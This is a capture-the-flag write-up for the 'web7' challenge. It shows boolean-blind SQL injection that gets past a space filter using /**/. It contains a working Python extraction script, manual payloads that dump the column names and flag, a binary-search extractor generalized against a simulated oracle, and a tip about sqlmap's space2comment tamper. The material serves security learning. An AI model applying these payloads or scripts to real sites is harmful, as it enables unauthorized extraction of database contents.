web7
I kept wondering: if keywords get filtered, how do you work out the number of columns? With blind injection that problem apparently goes away: a boolean-based probe never UNIONs anything, it only asks the page a yes/no question, so the column count is never needed.
Before starting the challenge, first check which keywords are filtered:
index.php?id=1'or1=1#
index.php?id=1'or 1=1#
As soon as a space is present the page errors out, so spaces are filtered.
Blind injection compares one character at a time, which is tedious, so for this challenge I am using a script written by a more experienced player.
import requests

# Spaces are filtered, so every space in the payload is written as /**/ instead.
# id=-1' matches no row, so the page only renders a result (the Kipling poem)
# when the injected OR condition is true.
url = "https://7785f4a8-dd2f-4a53-acb5-61d19f2c5c57.chall.ctf.show/index.php?id=-1'/**/"
TRUE_MARKER = 'By Rudyard Kipling'


def db(url):  # dump the database name
    name = ''
    for i in range(1, 5):          # assumes the name is at most 4 characters long
        for j in range(32, 128):
            # substr(x from i for 1) is the comma-free form of substr(x, i, 1)
            u = "or/**/ascii(substr(database()/**/from/**/" + str(i) + "/**/for/**/1))=" + str(j) + "#"
            s = url + u
            print(s)
            r = requests.get(s)
            if TRUE_MARKER in r.text:
                name += chr(j)
                print(name)
                break
    return name


def table(url):  # dump the table names
    for i in range(4):             # assumes at most 4 tables
        table_name = ''
        for j in range(1, 6):      # assumes each name is at most 5 characters long
            for k in range(48, 128):
                # || is logical OR in MySQL (unless PIPES_AS_CONCAT is enabled)
                u = ("||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables"
                     "/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/" + str(i) +
                     ")/**/from/**/" + str(j) + "/**/for/**/1))=" + str(k) + "#")
                s = url + u
                print(s)
                r = requests.get(s)
                if TRUE_MARKER in r.text:
                    table_name += chr(k)
                    break
        print(table_name)


db(url)
table(url)
Database name: web7; tables: flag, page, user.
Unfortunately, when I copied the script's approach for the column names, it was unable to dump them.
The last two steps were done by hand. Each payload tests one character at a time: ascii 102 is 'f'.
id=-1'/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102#
id=-1'/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),1,1))=102#
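The script above stops at the table names and the last two steps were done by hand. The following is an added example, not the author's script and not part of the original write-up: the same boolean-blind technique generalized into one extractor that takes any SQL expression, uses a binary search on the ASCII value (about 7 requests per character instead of up to 96 equality probes), and detects the end of the string because ascii('') is 0 in MySQL. It runs offline against a constructed stand-in for the challenge database: FAKE_ROWS, fake_oracle, the "id,flag" column list and the sample flag value are assumptions made for the demo, not data from the challenge.

```python
import re

TRUE_MARKER = "By Rudyard Kipling"   # text that appears only when a row is returned
SPACE = "/**/"                        # inline comment used as a space substitute


def build_payload(expr, pos, threshold):
    """Boolean-blind probe: true when ascii(substr(expr, pos, 1)) > threshold.

    Every space is written as /**/ so the payload survives the space filter, and
    MySQL's 'substr(x from i for n)' form keeps the outer expression comma-free.
    """
    expr = expr.replace(" ", SPACE)
    parts = ["-1'", "or", "ascii(substr((%s)" % expr, "from", str(pos), "for",
             "1))>%d#" % threshold]
    return SPACE.join(parts)


def extract(oracle, expr, maxlen=64):
    """Recover expr one character at a time with a binary search over 0..127.

    oracle(payload) must return True when the page shows the 'true' marker.
    substr past the end of the string is '' and ascii('') is 0, so a 0 ends it.
    """
    out = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127                     # invariant: lo <= value <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(expr, pos, mid)):   # value > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def dump(oracle):
    """Same steps as the write-up: database, tables, columns of flag, the flag."""
    return {
        "database": extract(oracle, "database()"),
        "tables": extract(oracle, "select group_concat(table_name) from "
                                  "information_schema.tables where table_schema=database()"),
        "columns": extract(oracle, 'select group_concat(column_name) from '
                                   'information_schema.columns where table_name="flag"'),
        "flag": extract(oracle, "select flag from flag limit 0,1"),
    }


# Constructed stand-in for the challenge database (assumed values, not a real dump).
FAKE_ROWS = {
    "database()": "web7",
    "select group_concat(table_name) from information_schema.tables "
    "where table_schema=database()": "flag,page,user",
    'select group_concat(column_name) from information_schema.columns '
    'where table_name="flag"': "id,flag",
    "select flag from flag limit 0,1": "flag{not_the_real_flag}",
}

PROBE = re.compile(r"^-1'/\*\*/or/\*\*/ascii\(substr\(\((.+)\)/\*\*/from/\*\*/(\d+)"
                   r"/\*\*/for/\*\*/1\)\)>(\d+)#$")


def fake_oracle(payload):
    """Simulates the vulnerable page: a space makes it error out (no poem on the
    error page, so the answer is False); otherwise the probe is evaluated
    against FAKE_ROWS the way MySQL would."""
    if " " in payload:
        return False
    m = PROBE.match(payload)
    if not m:
        return False
    expr = m.group(1).replace(SPACE, " ")
    pos, threshold = int(m.group(2)), int(m.group(3))
    value = FAKE_ROWS.get(expr, "")
    ch = value[pos - 1:pos]                         # '' once past the end
    return (ord(ch) if ch else 0) > threshold       # ascii('') = 0


if __name__ == "__main__":
    for name, value in dump(fake_oracle).items():
        print(name, "=", value)
```

Against the live challenge the oracle is a function that GETs the page with the payload appended as the id parameter and returns whether TRUE_MARKER is in the response body; group_concat collapses the per-table limit/offset loop into a single string, and the character loop ends on its own instead of relying on a guessed maximum length.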
With sqlmap this challenge is actually a bit easier: load the space2comment tamper script (the --tamper=space2comment option),
because we already know spaces are filtered, and that tamper replaces every space with /**/.
The final result is a bit more complete than what the script dumped.